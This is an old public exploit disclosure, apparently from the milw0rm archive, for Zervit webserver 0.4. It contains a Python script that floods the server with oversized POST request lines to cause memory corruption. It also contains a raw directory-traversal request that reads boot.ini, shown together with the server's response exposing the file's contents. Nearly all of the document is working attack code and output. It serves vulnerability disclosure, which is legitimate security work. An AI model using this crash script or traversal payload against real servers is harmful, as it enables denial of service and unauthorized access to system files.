63 lines
No EOL
1.7 KiB
Text
63 lines
No EOL
1.7 KiB
Text
####################### Zervit webserver 0.4 Directory Traversal & Memory Corruption #########
|
|
|
|
|
|
By: e.wiZz! & shinnai
|
|
|
|
Site: shinnai.net & balcansecurity.com
|
|
|
|
|
|
|
|
[Memory Corruption]
|
|
########################################################################
|
|
|
|
import socket
|
|
|
|
host = "127.0.0.1"
|
|
port = 8080
|
|
|
|
try:
|
|
for i in range(1,10):
|
|
buff = "a" * 3330
|
|
request = "POST " + buff + " HTTP/1.0"
|
|
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
connection.connect((host, port))
|
|
connection.send(request)
|
|
except:
|
|
raw_input('\n\nUnable to connect. Press "Enter" to quit...')
|
|
|
|
|
|
|
|
[Directory traversal]
|
|
#################################################################################
|
|
|
|
[Request]
|
|
|
|
GET /../../../../../boot.ini HTTP/1.1
|
|
User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1
|
|
Host: localhost:80
|
|
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
|
|
Accept-Language: en-US,en;q=0.9
|
|
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
|
|
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
|
|
Connection: Keep-Alive, TE
|
|
TE: deflate, gzip, chunked, identity, trailers
|
|
#################################################
|
|
|
|
[Response]
|
|
|
|
HTTP/1.1 200 OK
|
|
Server: Zervit 0.4
|
|
X-Powered-By: Carbono
|
|
Connection: close
|
|
Accept-Ranges: bytes
|
|
Content-Type: application/octet-stream
|
|
Content-Length: 355
|
|
|
|
[boot loader]
|
|
timeout=30
|
|
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
|
|
[operating systems]
|
|
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT
|
|
##################################################
|
|
|
|
# milw0rm.com [2009-05-13] |